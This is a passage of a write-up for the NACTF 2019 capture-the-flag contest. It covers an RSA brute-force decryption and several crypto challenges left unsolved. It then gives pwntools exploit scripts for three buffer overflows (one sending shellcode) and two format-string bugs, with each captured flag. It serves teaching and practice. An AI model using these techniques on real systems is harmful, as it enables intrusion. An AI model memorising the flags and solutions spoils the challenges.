c = gmpy2.mpz(17092019895398435490936645877681389522100314381280314137324590582626113380519883878346612680436149571504342956062627199254592419000136198748264157134720216337534802137245374257104787163473593768075381161119603573787923015405105192411372689756878820005036480013443173993126005361536816259899310244534769833694660355126920566669139672444357708161337389888825104348833002955918763849005061351140425567156148202269336347554989169075541289307981444741551677799416273481457219933391047628725337828725080079301570909831609401028488393457876225318163558871115320155827798534306397644894097358075465535794590825299057956641732)

# Textbook RSA without padding is deterministic, so every candidate
# nactf{xxxx} can be encrypted with the public key and compared against c.
for letters in itertools.product(string.ascii_lowercase, repeat=4):
    candidate = 'nactf{' + ''.join(letters) + '}'
    m = int(binascii.hexlify(candidate.encode()), 16)   # ascii -> hex -> number
    if gmpy2.powmod(m, e, n) == c:
        print(candidate)
        break

Flag:

nactf{pkcs}

Dr. J’s Group Test Randomizer: Board Problem #1

Description:

Dr. J is back with another group test, and he patched his prng so we can’t predict the next number based on the previous one! Can still you help Leaf predict the next output of the prng?

nc shell.2019.nactf.com 31258


Solution:


Flag:


Reversible Sneaky Algorithm #2

Description:

Oligar was thinking about number theory at AwesomeMath when he decided to encrypt a message with RSA. As a mathematician, he made various observations about the numbers. He told Molly one such observation:

a^r ≡ 1 (mod n)

He isn’t SHOR if he accidentally revealed anything by telling Molly this fact… can you decrypt his message?

Source code, a and r, public key, and ciphertext are attached.


Solution:


Flag:


Dr. J’s Group Test Randomizer #2: BBOB

Description:

This is it. The last group test of the year. Dr. J patched his prng again so numbers won’t repeat, so I guess Leaf won’t get to know the group test pairs ahead of time… oh WEYL. Who knew middle square could make such a good prng?

nc shell.2019.nactf.com 31382


Solution:


Flag:


Binary Exploitation

BufferOverflow #0

Description:

The close cousin of a website for “Question marked as duplicate”

Can you cause a segfault and get the flag?

shell.2019.nactf.com:31475


Solution:

Overwrite the return address with the address of the win function.

Image

Exploit script:

#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *

# context(log_level="debug", arch="i386", os="linux")
# p = process('./bufover-0')
p = remote('shell.2019.nactf.com', 31475)
elf = ELF('./bufover-0', checksec=False)
addr_win = elf.sym['win']    # address of win() from the binary's symbol table

pd = b'a' * 0x1c             # fill the buffer up to the saved return address
pd += p32(addr_win)          # overwrite the return address with win()
p.sendline(pd)

p.interactive()

Flag:

nactf{0v3rfl0w_th4at_buff3r_18ghKusB}

BufferOverflow #1

Description:

The close cousin of a website for “Question marked as duplicate” - part 2!

Can you redirect code execution and get the flag?

Connect at shell.2019.nactf.com:31462


Solution:

Again, overwrite the return address with the address of win.

Image

Exploit script:

#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *

# context(log_level="debug", arch="i386", os="linux")
# p = process('./bufover-1')
p = remote('shell.2019.nactf.com', 31462)
elf = ELF('./bufover-1', checksec=False)
addr_win = elf.sym['win']    # address of win() from the binary's symbol table

pd = b'a' * 0x1c             # fill the buffer up to the saved return address
pd += p32(addr_win)          # overwrite the return address with win()
p.sendline(pd)
p.sendline(b'')
p.interactive()

Flag:

nactf{pwn_31p_0n_r3t_iNylg281}

BufferOverflow #2

Description:

The close cousin of a website for “Question marked as duplicate” - part 3!

Can you control the arguments to win() and get the flag?

Connect at shell.2019.nactf.com:31184


Solution:

At first I genuinely didn't know how to do this, partly because I'm weak at passing arguments.

But then checksec showed that this binary has an executable stack.

So, shellcode.

Image

Exploit script:

#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *

# context(log_level="debug", arch="", os="linux")
# p = process('./bufover-2')
p = remote('shell.2019.nactf.com', 31184)
elf = ELF('./bufover-2', checksec=False)
addr_vuln = 0x08049293       # return into the vulnerable function after gets()
addr_bss = elf.bss()
plt_gets = elf.plt['gets']

pd = b'a' * 0x1c             # fill the buffer up to the saved return address
pd += p32(plt_gets)          # first return into gets() ...
pd += p32(addr_vuln)         # ... which returns to the vulnerable function
pd += p32(addr_bss + 4)      # gets() argument: write into .bss
p.sendline(pd)

pd = asm(shellcraft.sh())    # stack/.bss are executable per checksec
# gdb.attach(p, "b *0x080492CD\nc")
p.sendline(pd)
p.sendline(b'')
p.recv()
p.interactive()

Flag:

nactf{PwN_th3_4rG5_T0o_Ky3v7Ddg}

Format #0

Description:

Someone didn’t tell Chaddha not to give user input as the first argument to printf() - use it to leak the flag!

Connect at shell.2019.nactf.com:31782


Solution:

The challenge says it's a format-string vulnerability, so first probe which positions can be used.

The flag shows up directly at the 24th argument of the format string.

So just print it.

Image

Final result:

Image

Exploit script:

#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *

# context(log_level="debug", arch="i386", os="linux")
# p = process('./format-0')
p = remote('shell.2019.nactf.com', 31782)
# gdb.attach(p, "b *0x080491F6\nc\nsi")

pd = b'%24$s'                # read the 24th argument as a string: the flag
p.sendline(pd)
p.recvuntil(b'You typed: ')
p.interactive()

Flag:

nactf{Pr1ntF_L34k_m3m0ry_r34d_nM05f469}

Format #1

Description:

printf can do more than just read memory… can you change the variable?

Connect at nc shell.2019.nactf.com 31560


Solution:

I just brute-forced the position of v4 from main in IDA.

Overwriting it is bound to produce an error, and then you simply change the value.

Image

Exploit script:

#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *

# context(log_level="debug", arch="i386", os="linux")
# p = process('./format-1')
p = remote('shell.2019.nactf.com', 31560)
# gdb.attach(p, "b *0x08049266\nc\nsi")

pd = b'%42d%24$n'            # print 42 bytes, then write that count into the 24th argument
p.sendline(pd)

p.interactive()

Flag:

nactf{Pr1ntF_wr1t3s_t0o_rZFCUmba}

Loopy #0

Description:

This program is quite short, but has got printf and gets in it! This shouldn’t be too hard, right?

Connect at nc shell.2019.nactf.com 31283


Solution:

Loopy #0 and Loopy #1 won't run locally even after changing LD_PRELOAD; they segfault immediately.
I couldn't find the matching libc online either, so I don't know how to proceed… apparently they can only be attacked remotely.


Flag:


Loopy #1

Description:

Same program as Loopy #0, but someone’s turned on the stack protector now!

Connect at nc shell.2019.nactf.com 31732


Solution:


Flag:

